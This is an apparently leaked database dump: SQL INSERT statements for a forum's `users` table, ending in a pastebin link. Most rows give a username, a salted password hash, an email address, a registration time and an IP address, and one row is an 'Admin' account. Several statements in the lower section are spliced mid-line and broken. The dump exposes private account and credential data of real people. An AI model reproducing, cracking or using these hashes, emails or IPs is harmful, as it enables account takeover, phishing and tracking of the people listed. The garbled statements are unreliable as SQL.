INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('984', 'blargeman', '5306ad9328c799a7cd6a4794d9583a95', '184', '3', 'notanemail@gmail.com', '', '', '0', '0', '1330633136', '146.185.25.171');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('985', 'donald_duck', 'b81c533c87cb2e3c30c6ab9111e9b52f', '949', '3', 'xplorahyper@gmail.com', '', '', '0', '0', '1330685405', '41.218.221.30');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('986', 'D4N110V1ND43', '4e9bc08909d7f8fa8f9f3cb92329ae20', '468', '3', 'luisa_schurmann12@hotmail.com', '', '', '0', '0', '1330736009', '190.205.93.69');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('987', 'Thingstowork', 'd3151d4eb8139e72fab229e6d9a08bea', '789', '3', 'thingstowork@gmail.com', '', '', '0', '0', '1330882641', '189.131.20.114');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('988', 'noriega', '3d32ba6a9bbb1757203bbfec0f351b48', '156', '3', '9j15y@tittbit.in', '', '', '0', '0', '1330918917', '192.162.102.183');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('989', 'anonymous', '06014684f98105db525ad1b9857d80e1', '812', '3', 'mynameis940@live.com', '', '', '0', '0', '1330972392', '146.255.78.116');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('990', 'harbleu', 'fa1609189885a4c47ef0d017d09a1be5', '706', '3', 'idonthaveone@hot.com', '', '', '0', '0', '1331136670', '178.86.12.155');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('991', 'dnsforever', '0841c649be057bd6a24f6175a5ebe881', '784', '3', 'dnsforever@hotmail.com', '', '', '0', '0', '1331222607', '186.81.253.69');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('992', 'muzato', '801399da82ba6ac4d33df0a63ab51139', '961', '3', 'adams@dcemail.com', '', '', '0', '0', '1331246589', '85.114.132.49');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('993', 'gperez', '0ae7b96009d97e620ded6ab3cd26c99b', '906', '3', 'garibaldisperez@gmail.com', '', '', '0', '0', '1331250660', '190.166.18.2');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('994', 'synths', '6fd3dfd7c25a540fcd7983baa0874420', '409', '3', 'portlandsup@hushmail.com', '', '', '0', '0', '1331298239', '82.128.204.29');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('995', 'xingtorus', 'b9122c0c7991fa032a41b7002e88df17', '324', '3', 'xingtorus@gmail.com', '', '', '0', '0', '1331395183', '223.188.152.129');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('996', 'cococo', 'cde49c7846facd11abc5b1fccc509c9f', '543', '3', 'cococo@hotmail.com', '', '', '0', '0', '1331430799', '190.128.63.20');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('997', 'crysis', '6208293d69e1e65027ba447d0f7499b3', '605', '3', 'josh.69.fox@gmail.com', '', '', '0', '0', '1331587222', '92.7.111.215');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('998', 'blackfox', '81b40bf86b4e2efdfb456284f4de6c8b', '926', '3', 'ingelandu@web.de', '', '', '0', '0', '1331705833', '81.173.147.57');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('999', 'ffff', 'e4b2134b2104db0a6ec0c9f98d7cf78f', '111', '3', 'fff@ya.com', '', '', '0', '0', '1331747463', '109.70.184.10');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1000', 'downhill', 'c5353e1863aa4b9802b523fccffc6fd7', '406', '3', 'louisbuiton18@hotmail.com', '', '', '0', '0', '1331851992', '186.169.157.66');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1001', 'sparrow', '2efc0b7fb94db3ac9bc6c13e7818dca9', '301', '3', 'sparrow@yopmail.com', '', '', '0', '0', '1331869017', '82.237.46.35');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1002', 'olawale11', 'e0a843c601c3e8a941e10e817f4a28e3', '618', '3', 'hello1861@yahoo.com', '', '', '0', '0', '1331889582', '41.206.12.15');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1003', 'roughlee', '530f6b3d42bf4f1cf094df7406f5f435', '983', '3', 'feelmeiret@yahoo.com', '', '', '0', '0', '1331924992', '188.66.6.132');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1004', 'paulallen16', 'f1ba9f644f51bae54873eb4c75b27a28', '859', '3', 'cardingunix@yahoo.com', '', '', '0', '0', '1331979267', '210.195.199.97');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1005', 'sonny', '6dfe2d2c112b3d3d7f4c436f49a07b1c', '864', '3', 'sonnycul@yahoo.com', '', '', '0', '0', '1332177476', '79.157.69.237');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1006', 'i.b89', 'eb98ddfb1575ef8c6aae806aa0b60927', '899', '3', 'lacangri_8389@hotmail.com', '', '', '0', '0', '1332356572', '136.145.182.24');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1007', 'baobao', 'b47ba82746cfd15b2ee0cff479af60e3', '794', '3', '1498567063@qq.com&#21253;bao', '', '', '0', '0', '1332423054', '221.234.39.204');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1008', 'd4rkn3s5', '918b03118f61ca2fe4c147dc3ebe98a5', '591', '3', 'dark@mailinator.com', '', '', '0', '0', '1332443351', '71.56.228.120');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1009', 'exploits', 'a4804300c1e6fd52656db54498ad297b', '987', '3', 'oejalan@hotmail.com', '', '', '0', '0', '1332534077', '190.42.55.13');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1010', '9999', '82ed4735a37372e70625e5ee42205a1e', '426', '3', 'kmarazms@yahoo.com', '', '', '0', '0', '1332619609', '86.184.75.220');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1011', 'pizzaman', 'f357f9d1d95c1f43e27ab7852705e14b', '557', '3', 'pizzaman@aol.com', '', '', '0', '0', '1332710410', '63.142.18.252');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1012', 'poderoza', '61f13a0f28f54c6b98d7de0454f0abdd', '724', '3', 'TOHBOLADO@HOTMAIL.COM', '', '', '0', '0', '1332747790', '201.1.205.249');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1013', 'usa144', '04377c54365243d380e7f2694f29d0b7', '995', '3', 'jobinius@gmail.com', '', '', '0', '0', '1332846408', '91.205.234.97');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1014', 'brainmark26', '4c3381d5999500255982d688eb0fe591', '419', '3', 'acainbrian@yahoo.com', '', '', '0', '0', '1333073920', '63.143.42.79');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1015', 'wizzardz01', '3014eef7b8ac46e88058552e3c9f8fcf', '134', '3', 'wizzardz01@hotmail.com', '', '', '0', '0', '1333143660', '188.246.71.125');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1016', 'BooB', 'e8a0c8a421e8881c20872a8e8fb0e6cb', '423', '3', 'travonpatterson11@yahoo.com', '', '', '0', '0', '1333180721', '64.31.35.156');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1017', 'elchino', '394408f0b164a3f14e7eec33c127bdc0', '610', '3', 'jayc1979@yahoo.com', '', '', '0', '0', '1333462942', '50.12.84.34');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1018', 'dominicci', 'e578d4931650ca1e93246a27145d7f77', '708', '3', 'johncharli87@yahoo.com', '', '', '0', '0', '1333463575', '50.12.84.34');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1019', 'chicomalo5', 'e845d3b7a915dc72ec483b6bc5dcbfde', '296', '3', 'chico_malo5@yahoo.com', '', '', '0', '0', '1333487532', '85.50.10.63');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1020', 'ir0nm4n', 'a7c6d465bb1ffe58679f8351d6703acc', '330', '3', 'ir0n.m4n@live.com', '', '', '0', '0', '1333488779', '96.251.182.125');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1021', 's7684', 'f6cb5e972e80c4f250edb43ddad6bb32', '666', '3', 's7684@hotmail.com', '', '', '0', '0', '1333526274', '69.90.60.116');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1022', 'colinchilvers', '81f5fe0443aacf5d7c6207a48af9fce5', '474', '3', 'colinchilvers@hotmail.com', '', '', '0', '0', '1333637475', '116.237.60.133');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1023', 'Jessyjackson', '3d5179df9fd9ecf17852f9f9f4b07acf', '250', '3', 'Jessyjackson80@ymail.com', '', '', '0', '0', '1333646275', '87.153.61.135');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1024', 'kengre', '98597afba4f790a7eadb982eae4c419d', '281', '3', 'kendragreen75@ymail.com', '', '', '0', '0', '1333907444', '174.37.207.112');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1025', 'feninyer', 'e6c86cf5ea9fd2f6c29c18f7d01f0fbb', '589', '3', 'feninyer@hotmail.com', '', '', '0', '0', '1334004381', '201.243.6.150');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1027', 'iPad', '8c335b60e5b44831d3c53d422fc76439', '702', '3', 'jaim.bolso@hotmail.com', '', '', '0', '0', '1334421896', '186.52.129.41');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1026', 'watertree2', '495be9035c8f0c9b171c4bd5da00cce6', '516', '3', 'watertree2@163.com', '', '', '0', '0', '1334161306', '113.128.100.225');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1028', 'aagguuss', '9eb051c0e0f6c9b164a818aa1c07d390', '415', '3', 'haryaleonhart@gmail.com', '', '', '0', '0', '1335019779', '114.79.17.79');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1029', 'optimized', '7d0e1c8d32385bbcb8aab738a8fecee7', '732', '3', 'optimized24@hotmail.com', '', '', '0', '0', '1335025594', '186.149.76.35');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1030', 'saghatso', '235ddfdc1641bec9a4393ac725f2a647', '475', '3', 'dejibandele@yahoo.com', '', '', '0', '0', '1335315269', '199.167.145.167');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1031', 'restricted', '5dc5f22892a9fca0d98eebebff3d6b8b', '356', '3', 'jooncooper@yahoo.com', '', '', '0', '0', '1335441409', '41.220.64.215');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1032', 'cupel', '119e2b750131afffcf7a22ae537380ee', '732', '3', 'revi.salo01@hotmail.com', '', '', '0', '0', '1335500607', '190.80.142.52');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1033', 'calvinklein', '4dd6a77901a509e9fdf4c201168dcee0', '854', '3', 'calvinklein_1978@hotmail.com', '', '', '0', '0', '1335652442', '95.120.64.105');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1034', 'creativeuk', '04454cbac1c79556ac2b9d36238d274b', '305', '3', 'creativeuk@tormail.org', '', '', '0', '0', '1335813478', '31.172.252.34');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1035', 'yessimen', 'dd382f26ed7cc134d464b3e59cb1e5ac', '493', '3', 'yessimen13@hotmail.com', '', '', '0', '0', '1336168610', '173.52.73.247');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1036', 'suncai99', 'a4ab352f7637cf6979038d8ea3e0dbfc', '503', '3', 'suncai99@ymail.com', '', '', '0', '0', '1336422900', '80.102.204.104');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1037', 'Eric_wang163', '1bdf00522b1567d59768b7f9714fc82c', '344', '3', 'Eric_wang163@hotmail.com', '', '', '0', '0', '1336487035', '222.65.45.105');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1038', 'RingZzer0', '94bd9570e1794cfbcd2b73e93d870307', '367', '3', 'RingZzer0@gmail.com', '', '', '0', '0', '1336634930', '122.170.98.37');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1039', 'kenis', '872772fbd8eab86024cf012a92fe3522', '169', '3', 'kenis.1@hotmail.com', '', '', '0', '0', '1337725181', '186.90.147.101');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1040', 'Sharkoon88', '6ce7282fba967a0ad41daefb906344fd', '137', '3', 'janharenbrock@yahoo.de', '', '', '0', '0', '1337876898', '89.13.118.215');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1041', 'mahsha', 'c3f75e2ab36533b6d2981718ed38edc8', '674', '3', 'mahsha91@yahoo.com', '', '', '0', '0', '1337893879', '184.75.217.103');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1042', 'kdaniels', '87402f5484dae99f2e5526402fd7e65b', '658', '3', 'danielskobby@gmail.com', '', '', '0', '0', '1338467206', '196.201.51.20');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1043', 'xielin', 'a8544897afb42a43528aeecbf2f05d94', '951', '3', 'xielinde@qq.com', '', '', '0', '0', '1338832555', '124.229.118.102');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1044', '1234124142', '39d357e91d7e681168992edbdec3a406', '569', '3', '1234124142@1234124142.com', '', '', '0', '0', '1339517363', '83.43.190.99');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1045', 'waheguru', '465d56a6c82fa886906b32cb86012c34', '410', '3', 'tushartaneja70@gmail.com', '', '', '0', '0', '1340196739', '117.224.117.122');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('1046', 'Brando', '19c951e0cafc5d025155867d9a9acf1f', '604', '3', 'malo_dragoonxx@hotmail.com', '', '', '0', '0', '1340304805', '190.118.186.182');
-------------------------------------------------------------------------------------------------------
'Admin', 'a939232b4e8079be75b3b83dae35af13', '883', '1', 'quitpp@gmail.com', '', '', '5', '0', '1329089830', '190.166.230.250');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'megganjr', 'b0ff090f32a944b8c3dde11da7601205', '279', '3', 'rayodesol00@hotmail.com', '', '', '0', '0', '1329334971', '186.78.232.120');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'dimaz', '62854fa586564d3a1743ec3f0cbbb938', '418', '3', 'club2011@hotmail.co.uk', '', '', '0', '0', '1329396863', '176.67.160.180');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahladiesmen', 'c5b9659ee8c0ec453a668fd136eb0f8c', '976', '3', 's_mc97@yahoo.com', '', '', '0', '0', '1329519381', '175.145.61.7');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'Palaciego', 'b9b14c72b12a6450a59f43da7ce56d92', '827', '3', 'supersonick@hotmail.es', '', '', '0', '0', '1329563274', '95.20.79.202');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'akr2010', '000aa392c4db8f6efdf47e9621f7bdbb', '416', '3', 'acb2k9@gmail.com', '', '', '0', '0', '1329721514', '190.51.241.209');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'ninjaninja', 'fc58d6208bb1e6f82cae75f3ab197ea1', '992', '3', 'ninjajri555@yahoo.com', '', '', '0', '0', '1329728650', '178.73.221.23');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'Musik', 'aa01295acc2647187535cf8238cd9bcf', '727', '3', 'roargasm@live.com', '', '', '0', '0', '1329774436', '216.231.134.98');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'sociopath', 'f0527d0fd2150adc3dd8f7be45600f01', '140', '3', 'exchangec@ymail.com', '', '', '0', '0', '1329782369', '95.211.27.23');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yah'bentheman', 'e17221ea9e21de3a0601f5eb9818ac0d', '299', '3', 'belgei@hotmail.com', '', '', '0', '0', '1329956961', '84.28.210.53');

http://pastebin.com/t47DS62c